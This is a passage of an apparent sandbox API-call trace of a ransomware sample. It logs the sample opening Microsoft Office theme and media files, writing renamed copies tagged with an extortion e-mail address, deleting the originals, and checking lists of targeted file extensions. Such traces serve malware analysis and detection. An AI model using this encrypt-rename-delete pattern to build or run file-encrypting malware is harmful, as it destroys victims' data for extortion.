"c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx")) returned 0x20 [0271.638] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0271.639] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.639] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.639] GetLastError () returned 0x0 [0271.639] ReadFile (in: hFile=0x3b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x4c9b, lpOverlapped=0x0) returned 1 [0271.652] WriteFile (in: hFile=0x388, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x4ca0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x4ca0, lpOverlapped=0x0) returned 1 [0271.653] ReadFile (in: hFile=0x3b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.653] WriteFile (in: hFile=0x388, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0271.654] SetEndOfFile (hFile=0x388) returned 1 [0271.654] CloseHandle (hObject=0x388) returned 1 [0271.654] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.654] SetEndOfFile (hFile=0x3b4) returned 1 [0271.656] CloseHandle (hObject=0x3b4) returned 1 [0271.656] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.656] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\urban.eftx")) returned 1 [0271.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.656] lstrlenW (lpString=".doc") returned 4 [0271.656] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.656] lstrlenW (lpString=".docx") returned 5 [0271.656] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.656] lstrlenW (lpString=".pdf") returned 4 [0271.656] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.656] lstrlenW (lpString=".xls") returned 4 [0271.656] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString=".xlsx") returned 5 [0271.657] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.657] lstrlenW (lpString=".ppt") returned 4 [0271.657] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.657] lstrlenW (lpString=".zip") returned 4 [0271.657] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString=".rar") returned 4 [0271.657] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString=".bz2") returned 4 [0271.657] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString=".7z") returned 3 [0271.657] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.657] lstrlenW (lpString=".dbf") returned 4 [0271.657] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.657] lstrlenW (lpString=".1cd") returned 4 [0271.657] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.657] lstrlenW (lpString=".jpg") returned 4 [0271.657] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.657] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.657] lstrlenW (lpString=".doc") returned 4 [0271.657] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString=".docx") returned 5 [0271.657] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.657] lstrlenW (lpString=".pdf") returned 4 [0271.657] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.657] lstrlenW (lpString=".xls") returned 4 [0271.658] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.658] lstrlenW (lpString=".xlsx") returned 5 [0271.658] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.658] lstrlenW (lpString=".ppt") returned 4 [0271.658] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.658] lstrlenW (lpString=".zip") returned 4 [0271.658] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.658] lstrlenW (lpString=".rar") returned 4 [0271.658] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.658] lstrlenW (lpString=".bz2") returned 4 [0271.658] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.658] lstrlenW (lpString=".7z") returned 3 [0271.658] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.658] lstrlenW (lpString=".dbf") returned 4 [0271.658] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.658] lstrlenW (lpString=".1cd") returned 4 [0271.658] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx") returned 77 [0271.658] lstrlenW (lpString=".jpg") returned 4 [0271.658] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.658] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.658] lstrlenW (lpString="Verve.eftx") returned 10 [0271.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0271.694] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=31224) returned 1 [0271.694] CloseHandle (hObject=0x3b4) returned 1 [0271.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx")) returned 0x20 [0271.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0271.695] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.695] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.695] GetLastError () returned 0x0 [0271.695] ReadFile (in: hFile=0x3b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x79f8, lpOverlapped=0x0) returned 1 [0271.700] WriteFile (in: hFile=0x388, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x7a00, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x7a00, lpOverlapped=0x0) returned 1 [0271.701] ReadFile (in: hFile=0x3b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.701] WriteFile (in: hFile=0x388, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0271.701] SetEndOfFile (hFile=0x388) returned 1 [0271.701] CloseHandle (hObject=0x388) returned 1 [0271.701] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.701] SetEndOfFile (hFile=0x3b4) returned 1 [0271.703] CloseHandle (hObject=0x3b4) returned 1 [0271.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.704] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx")) returned 1 [0271.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.715] lstrlenW (lpString=".doc") returned 4 [0271.715] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.715] lstrlenW (lpString=".docx") returned 5 [0271.715] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.715] lstrlenW (lpString=".pdf") returned 4 [0271.715] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.715] lstrlenW (lpString=".xls") returned 4 [0271.715] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.715] lstrlenW (lpString=".xlsx") returned 5 [0271.715] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.716] lstrlenW (lpString=".ppt") returned 4 [0271.716] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.716] lstrlenW (lpString=".zip") returned 4 [0271.716] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString=".rar") returned 4 [0271.716] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString=".bz2") returned 4 [0271.716] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString=".7z") returned 3 [0271.716] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.716] lstrlenW (lpString=".dbf") returned 4 [0271.716] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.716] lstrlenW (lpString=".1cd") returned 4 [0271.716] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.716] lstrlenW (lpString=".jpg") returned 4 [0271.716] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.716] lstrlenW (lpString=".doc") returned 4 [0271.716] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString=".docx") returned 5 [0271.716] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.716] lstrlenW (lpString=".pdf") returned 4 [0271.716] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.716] lstrlenW (lpString=".xls") returned 4 [0271.716] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.717] lstrlenW (lpString=".xlsx") returned 5 [0271.717] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.717] lstrlenW (lpString=".ppt") returned 4 [0271.717] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.717] lstrlenW (lpString=".zip") returned 4 [0271.717] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.717] lstrlenW (lpString=".rar") returned 4 [0271.717] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.717] lstrlenW (lpString=".bz2") returned 4 [0271.717] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.717] lstrlenW (lpString=".7z") returned 3 [0271.717] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.717] lstrlenW (lpString=".dbf") returned 4 [0271.717] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.717] lstrlenW (lpString=".1cd") returned 4 [0271.717] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned 77 [0271.717] lstrlenW (lpString=".jpg") returned 4 [0271.717] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.717] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.717] lstrlenW (lpString="Waveform.eftx") returned 13 [0271.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.728] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=112504) returned 1 [0271.728] CloseHandle (hObject=0x388) returned 1 [0271.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 0x20 [0271.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.728] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.728] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0271.728] GetLastError () returned 0x0 [0271.728] ReadFile (in: hFile=0x388, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x1b778, lpOverlapped=0x0) returned 1 [0271.732] WriteFile (in: hFile=0x3b0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1b780, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1b780, lpOverlapped=0x0) returned 1 [0271.734] ReadFile (in: hFile=0x388, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.734] WriteFile (in: hFile=0x3b0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xee, lpOverlapped=0x0) returned 1 [0271.734] SetEndOfFile (hFile=0x3b0) returned 1 [0271.734] CloseHandle (hObject=0x3b0) returned 1 [0271.734] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.734] SetEndOfFile (hFile=0x388) returned 1 [0271.738] CloseHandle (hObject=0x388) returned 1 [0271.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.738] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 1 [0271.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.738] lstrlenW (lpString=".doc") returned 4 [0271.738] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString=".docx") returned 5 [0271.739] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.739] lstrlenW (lpString=".pdf") returned 4 [0271.739] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString=".xls") returned 4 [0271.739] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString=".xlsx") returned 5 [0271.739] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.739] lstrlenW (lpString=".ppt") returned 4 [0271.739] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.739] lstrlenW (lpString=".zip") returned 4 [0271.739] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString=".rar") returned 4 [0271.739] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString=".bz2") returned 4 [0271.739] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString=".7z") returned 3 [0271.739] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.739] lstrlenW (lpString=".dbf") returned 4 [0271.739] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.739] lstrlenW (lpString=".1cd") returned 4 [0271.739] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.739] lstrlenW (lpString=".jpg") returned 4 [0271.739] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.739] lstrlenW (lpString=".doc") returned 4 [0271.740] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString=".docx") returned 5 [0271.740] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.740] lstrlenW (lpString=".pdf") returned 4 [0271.740] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString=".xls") returned 4 [0271.740] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString=".xlsx") returned 5 [0271.740] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.740] lstrlenW (lpString=".ppt") returned 4 [0271.740] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.740] lstrlenW (lpString=".zip") returned 4 [0271.740] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString=".rar") returned 4 [0271.740] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString=".bz2") returned 4 [0271.740] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString=".7z") returned 3 [0271.740] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.740] lstrlenW (lpString=".dbf") returned 4 [0271.740] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.740] lstrlenW (lpString=".1cd") returned 4 [0271.740] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.740] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0271.740] lstrlenW (lpString=".jpg") returned 4 [0271.740] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.741] lstrcmpiW (lpString1=".MML", lpString2=".USA") returned -1 [0271.741] lstrlenW (lpString="CAGCAT10.MML") returned 12 [0271.741] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.742] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=312400) returned 1 [0271.742] CloseHandle (hObject=0x388) returned 1 [0271.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 0x20 [0271.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.742] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, 